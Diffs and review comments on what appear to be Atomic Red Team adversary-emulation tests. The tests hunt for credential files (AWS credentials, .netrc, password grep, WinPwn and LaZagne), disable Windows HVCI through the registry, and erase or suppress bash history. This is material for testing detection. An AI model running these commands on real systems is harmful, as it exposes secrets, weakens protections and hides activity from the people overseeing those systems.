```sh
|
||||
find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Extract Browser and System credentials with LaZagne
|
||||
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
@@ -61,7 +96,7 @@ python2 laZagne.py all
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Extract passwords with grep
|
||||
## Atomic Test #3 - Extract passwords with grep
|
||||
Extracting credentials from files
|
||||
|
||||
**Supported Platforms:** macOS, Linux
|
||||
@@ -94,7 +129,7 @@ grep -ri password #{file_path}
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Extracting passwords with findstr
|
||||
## Atomic Test #4 - Extracting passwords with findstr
|
||||
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
@@ -123,7 +158,7 @@ ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - Access unattend.xml
|
||||
## Atomic Test #5 - Access unattend.xml
|
||||
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
|
||||
If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
|
||||
|
||||
@@ -153,7 +188,7 @@ type C:\Windows\Panther\Unattend\unattend.xml
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #5 - Find and Access Github Credentials
|
||||
## Atomic Test #6 - Find and Access Github Credentials
|
||||
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
|
||||
|
||||
**Supported Platforms:** macOS, Linux
|
||||
@@ -181,7 +216,7 @@ for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #6 - WinPwn - sensitivefiles
|
||||
## Atomic Test #7 - WinPwn - sensitivefiles
|
||||
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
@@ -211,7 +246,7 @@ sensitivefiles -noninteractive -consoleoutput
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #7 - WinPwn - Snaffler
|
||||
## Atomic Test #8 - WinPwn - Snaffler
|
||||
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
@@ -241,7 +276,7 @@ Snaffler -noninteractive -consoleoutput
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #8 - WinPwn - powershellsensitive
|
||||
## Atomic Test #9 - WinPwn - powershellsensitive
|
||||
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
@@ -271,7 +306,7 @@ powershellsensitive -consoleoutput -noninteractive
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #9 - WinPwn - passhunt
|
||||
## Atomic Test #10 - WinPwn - passhunt
|
||||
Search for Passwords on this system using passhunt via WinPwn
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
@@ -311,7 +346,7 @@ rm -force -recurse .\Vulnerabilities -ErrorAction Ignore
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #10 - WinPwn - SessionGopher
|
||||
## Atomic Test #11 - WinPwn - SessionGopher
|
||||
Launches SessionGopher on this system via WinPwn
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
@@ -341,7 +376,7 @@ sessionGopher -noninteractive -consoleoutput
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #11 - WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials
|
||||
## Atomic Test #12 - WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials
|
||||
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
@@ -1,6 +1,22 @@
|
||||
attack_technique: T1552.001
|
||||
display_name: 'Unsecured Credentials: Credentials In Files'
|
||||
atomic_tests:
|
||||
- name: Find AWS credentials
|
||||
auto_generated_guid: 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
|
||||
description: |
|
||||
Find local AWS credentials from file, defaults to using / as the look path.
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
type: string
|
||||
default: /
|
||||
executor:
|
||||
command: |
|
||||
find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null
|
||||
name: sh
|
||||
- name: Extract Browser and System credentials with LaZagne
|
||||
auto_generated_guid: 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79
|
||||
description: |
|
||||
|
||||
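Review bot: `#{file_path}` is interpolated into the `find` command unquoted, so a user-supplied path containing spaces or glob characters is word-split by `sh` and the search runs against the wrong location; quote it, `find "#{file_path}" -name "credentials" -type f -path "*/.aws/*" 2>/dev/null`. With the default `/` the traversal also descends into `/proc`, `/sys` and any network mounts, which can make the test slow or hang on some hosts, so the `description` should say that `file_path` can be narrowed. The `2>/dev/null` hides permission errors, which means a non-elevated run silently reports nothing for directories it could not read; noting that in the description, or setting `elevation_required`, would make the outcome interpretable.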
@@ -92,6 +92,8 @@ Adversaries may also tamper with artifacts deployed and utilized by security too
|
||||
|
||||
- [Atomic Test #43 - Disable Memory Swap](#atomic-test-43---disable-memory-swap)
|
||||
|
||||
- [Atomic Test #44 - Disable Hypervisor-Enforced Code Integrity (HVCI)](#atomic-test-44---disable-hypervisor-enforced-code-integrity-hvci)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -1776,4 +1778,60 @@ sync
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #44 - Disable Hypervisor-Enforced Code Integrity (HVCI)
|
||||
This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity "Enabled" value to "0".
|
||||
The pre-req needs to be ran in order to setup HVCI and have it enabled.
|
||||
We do not recommend running this in production.
|
||||
[Black Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)
|
||||
[Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 70bd71e6-eba4-4e00-92f7-617911dbe020
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 0 /f
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `powershell`!
|
||||
##### Description: HVCI must be enabled
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1 }
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -861,3 +861,36 @@ atomic_tests:
|
||||
sync
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Disable Hypervisor-Enforced Code Integrity (HVCI)
|
||||
auto_generated_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020
|
||||
description: |
|
||||
This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity "Enabled" value to "0".
|
||||
The pre-req needs to be ran in order to setup HVCI and have it enabled.
|
||||
We do not recommend running this in production.
|
||||
[Black Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)
|
||||
[Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
HVCI must be enabled
|
||||
prereq_command: |
|
||||
if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1 }
|
||||
get_prereq_command: |
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
|
||||
executor:
|
||||
command: |
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 0 /f
|
||||
cleanup_command: |
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
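Review bot: `cleanup_command` (the block before `name: powershell`) deletes every DeviceGuard value unconditionally, including `EnableVirtualizationBasedSecurity` and `RequirePlatformSecurityFeatures`, so on a host where HVCI was already configured before the test — the state `prereq_command` asserts — cleanup leaves the machine with VBS/HVCI removed rather than restored, a weaker posture than the test found it in. Since the prereq requires HVCI to be enabled before the test runs, cleanup should put that state back, e.g. `reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f`, and only remove the other values if `get_prereq_command` created them (a `reg export` of the key taken before the test would make that exact). `prereq_command` also requires both `Locked` values to exist, which a host that has HVCI enabled by policy rather than by `get_prereq_command` may not have, so I would confirm the check against such a host before relying on it.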
@@ -16,6 +16,16 @@ Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/te
|
||||
|
||||
- [Atomic Test #2 - Mac HISTCONTROL](#atomic-test-2---mac-histcontrol)
|
||||
|
||||
- [Atomic Test #3 - Clear bash history](#atomic-test-3---clear-bash-history)
|
||||
|
||||
- [Atomic Test #4 - Setting the HISTCONTROL environment variable](#atomic-test-4---setting-the-histcontrol-environment-variable)
|
||||
|
||||
- [Atomic Test #5 - Setting the HISTFILESIZE environment variable](#atomic-test-5---setting-the-histfilesize-environment-variable)
|
||||
|
||||
- [Atomic Test #6 - Setting the HISTFILE environment variable](#atomic-test-6---setting-the-histfile-environment-variable)
|
||||
|
||||
- [Atomic Test #7 - Setting the HISTIGNORE environment variable](#atomic-test-7---setting-the-histignore-environment-variable)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -80,4 +90,215 @@ https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcon
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Clear bash history
|
||||
An attacker may clear the bash history cache and the history file as their last act before logging off to remove the record of their command line activities.
|
||||
|
||||
In this test we use the $HISTFILE variable throughout to 1. confirms the $HISTFILE variable is set 2. echo "" into it 3..5 confirm the file is empty 6 clear the history cache 7. confirm the history cache is empty. This is when the attacker would logoff.
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 878794f7-c511-4199-a950-8c28b3ed8e5b
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
cp $HISTFILE $HISTFILE.OLD
|
||||
if ((${#HISTFILE[@]})); then echo $HISTFILE; fi
|
||||
echo "" > $HISTFILE
|
||||
if [ $(wc -c <$HISTFILE) -gt 1 ]; then echo "$HISTFILE is larger than 1k"; fi
|
||||
ls -la $HISTFILE
|
||||
cat $HISTFILE
|
||||
history -c
|
||||
if [ $(history |wc -l) -eq 1 ]; then echo "History cache cleared"; fi
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```bash
|
||||
mv -f $HISTFILE.OLD $HISTFILE
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - Setting the HISTCONTROL environment variable
|
||||
An attacker may exploit the space before a command (e.g. " ls") or the duplicate command suppression feature in Bash history to prevent their commands from being recorded in the history file or to obscure the order of commands used.
|
||||
|
||||
In this test we 1. sets $HISTCONTROL to ignoreboth 2. clears the history cache 3. executes ls -la with a space in-front of it 4. confirms that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups 6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms that their is only one command in history
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 10ab786a-028e-4465-96f6-9e83ca6c5f24
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
TEST=$(echo $HISTCONTROL)
|
||||
if [ "$HISTCONTROL" != "ignoreboth" ]; then export HISTCONTROL="ignoreboth"; fi
|
||||
history -c
|
||||
ls -la $HISTFILE # " ls -la $HISTFILE"
|
||||
if [ $(history |wc -l) -eq 1 ]; then echo "ls -la is not in history cache"; fi
|
||||
# -> ls -la is not in history cache
|
||||
if [ "$HISTCONTROL" != "erasedups" ]; then export HISTCONTROL="erasedups"; fi
|
||||
history -c
|
||||
ls -la $HISTFILE
|
||||
ls -la $HISTFILE
|
||||
ls -la $HISTFILE
|
||||
if [ $(history |wc -l) -eq 2 ]; then echo "Their is only one entry for ls -la $HISTFILE"; fi
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```bash
|
||||
export HISTCONTROL=$(echo $TEST)
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #5 - Setting the HISTFILESIZE environment variable
|
||||
An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
TEST=$(echo $HISTFILESIZE)
|
||||
echo $HISTFILESIZE
|
||||
export HISTFILESIZE=0
|
||||
if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; fi
|
||||
# -> $HISTFILESIZE is zero
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```bash
|
||||
export HISTCONTROL=$(echo $TEST)
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #6 - Setting the HISTFILE environment variable
|
||||
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
TEST=$(echo $HISTFILE)
|
||||
echo $HISTFILE
|
||||
export HISTFILE="/dev/null"
|
||||
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
|
||||
# -> $HISTFILE is /dev/null
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```bash
|
||||
export HISTFILE=$(echo $TEST)
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #7 - Setting the HISTIGNORE environment variable
|
||||
An Adversary may take advantage of the HISTIGNORE environment variable either to ignore particular commands or all commands.
|
||||
|
||||
In this test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this history cache 3..4 execute ls commands 5. confirm that the ls commands are not in the history cache 6. unset HISTIGNORE variable 7.. same again, but ignoring ALL commands.
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** f12acddb-7502-4ce6-a146-5b62c59592f1
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='ls*:rm*:ssh*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
|
||||
# -> $HISTIGNORE = ls*:rm*:ssh*
|
||||
history -c
|
||||
ls -la $HISTFILE
|
||||
ls -la ~/.bash_logout
|
||||
if [ $(history |wc -l) -eq 1 ]; then echo "ls commands are not in history"; fi
|
||||
# -> ls commands are not in history
|
||||
unset HISTIGNORE
|
||||
|
||||
if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
|
||||
# -> $HISTIGNORE = *
|
||||
history -c
|
||||
whoami
|
||||
groups
|
||||
if [ $(history |wc -l) -eq 0 ]; then echo "History cache is empty"; fi
|
||||
# -> History cache is empty
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```bash
|
||||
unset HISTIGNORE
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -35,3 +35,119 @@ atomic_tests:
|
||||
3. ls
|
||||
4. whoami > recon.txt
|
||||
name: manual
|
||||
- name: Clear bash history
|
||||
auto_generated_guid: 878794f7-c511-4199-a950-8c28b3ed8e5b
|
||||
description: |
|
||||
An attacker may clear the bash history cache and the history file as their last act before logging off to remove the record of their command line activities.
|
||||
|
||||
In this test we use the $HISTFILE variable throughout to 1. confirms the $HISTFILE variable is set 2. echo "" into it 3..5 confirm the file is empty 6 clear the history cache 7. confirm the history cache is empty. This is when the attacker would logoff.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
cp $HISTFILE $HISTFILE.OLD
|
||||
if ((${#HISTFILE[@]})); then echo $HISTFILE; fi
|
||||
echo "" > $HISTFILE
|
||||
if [ $(wc -c <$HISTFILE) -gt 1 ]; then echo "$HISTFILE is larger than 1k"; fi
|
||||
ls -la $HISTFILE
|
||||
cat $HISTFILE
|
||||
history -c
|
||||
if [ $(history |wc -l) -eq 1 ]; then echo "History cache cleared"; fi
|
||||
cleanup_command: |
|
||||
mv -f $HISTFILE.OLD $HISTFILE
|
||||
- name: Setting the HISTCONTROL environment variable
|
||||
auto_generated_guid: 10ab786a-028e-4465-96f6-9e83ca6c5f24
|
||||
description: |
|
||||
An attacker may exploit the space before a command (e.g. " ls") or the duplicate command suppression feature in Bash history to prevent their commands from being recorded in the history file or to obscure the order of commands used.
|
||||
|
||||
In this test we 1. sets $HISTCONTROL to ignoreboth 2. clears the history cache 3. executes ls -la with a space in-front of it 4. confirms that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups 6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms that their is only one command in history
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
TEST=$(echo $HISTCONTROL)
|
||||
if [ "$HISTCONTROL" != "ignoreboth" ]; then export HISTCONTROL="ignoreboth"; fi
|
||||
history -c
|
||||
ls -la $HISTFILE # " ls -la $HISTFILE"
|
||||
if [ $(history |wc -l) -eq 1 ]; then echo "ls -la is not in history cache"; fi
|
||||
# -> ls -la is not in history cache
|
||||
if [ "$HISTCONTROL" != "erasedups" ]; then export HISTCONTROL="erasedups"; fi
|
||||
history -c
|
||||
ls -la $HISTFILE
|
||||
ls -la $HISTFILE
|
||||
ls -la $HISTFILE
|
||||
if [ $(history |wc -l) -eq 2 ]; then echo "Their is only one entry for ls -la $HISTFILE"; fi
|
||||
cleanup_command: |
|
||||
export HISTCONTROL=$(echo $TEST)
|
||||
- name: Setting the HISTFILESIZE environment variable
|
||||
auto_generated_guid: 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
|
||||
description: |
|
||||
An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
TEST=$(echo $HISTFILESIZE)
|
||||
echo $HISTFILESIZE
|
||||
export HISTFILESIZE=0
|
||||
if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; fi
|
||||
# -> $HISTFILESIZE is zero
|
||||
cleanup_command: |
|
||||
export HISTCONTROL=$(echo $TEST)
|
||||
- name: Setting the HISTFILE environment variable
|
||||
auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
|
||||
description: |
|
||||
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
TEST=$(echo $HISTFILE)
|
||||
echo $HISTFILE
|
||||
export HISTFILE="/dev/null"
|
||||
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
|
||||
# -> $HISTFILE is /dev/null
|
||||
cleanup_command: |
|
||||
export HISTFILE=$(echo $TEST)
|
||||
- name: Setting the HISTIGNORE environment variable
|
||||
auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1
|
||||
description: |
|
||||
An Adversary may take advantage of the HISTIGNORE environment variable either to ignore particular commands or all commands.
|
||||
|
||||
In this test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this history cache 3..4 execute ls commands 5. confirm that the ls commands are not in the history cache 6. unset HISTIGNORE variable 7.. same again, but ignoring ALL commands.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='ls*:rm*:ssh*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
|
||||
# -> $HISTIGNORE = ls*:rm*:ssh*
|
||||
history -c
|
||||
ls -la $HISTFILE
|
||||
ls -la ~/.bash_logout
|
||||
if [ $(history |wc -l) -eq 1 ]; then echo "ls commands are not in history"; fi
|
||||
# -> ls commands are not in history
|
||||
unset HISTIGNORE
|
||||
|
||||
if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
|
||||
# -> $HISTIGNORE = *
|
||||
history -c
|
||||
whoami
|
||||
groups
|
||||
if [ $(history |wc -l) -eq 0 ]; then echo "History cache is empty"; fi
|
||||
# -> History cache is empty
|
||||
cleanup_command: |
|
||||
unset HISTIGNORE
|
||||
|
||||
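Review bot: The cleanup for "Setting the HISTFILESIZE environment variable" restores the wrong variable: `export HISTCONTROL=$(echo $TEST)` where the attack command saved `$HISTFILESIZE`; it should be `export HISTFILESIZE=$TEST`. More generally `TEST` is a plain shell variable set in `command`, and if the runner executes `cleanup_command` in a separate shell process (which I would expect), `$TEST` is empty there and the HISTCONTROL and HISTFILE cleanups export an empty value as well; writing the saved value to a temp file, or simply `unset`ting the variable as the HISTIGNORE test does, would be more reliable. In "Clear bash history", `cp $HISTFILE $HISTFILE.OLD` runs before the line that checks `$HISTFILE` is set, so with HISTFILE unset `cp` fails on a missing operand; move the check first. The output string `Their is only one entry for ls -la $HISTFILE` should read `There`.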
@@ -30,13 +30,16 @@ Attackers who have permissions, can run malicious commands in containers in the
|
||||
|------|-------------|------|---------------|
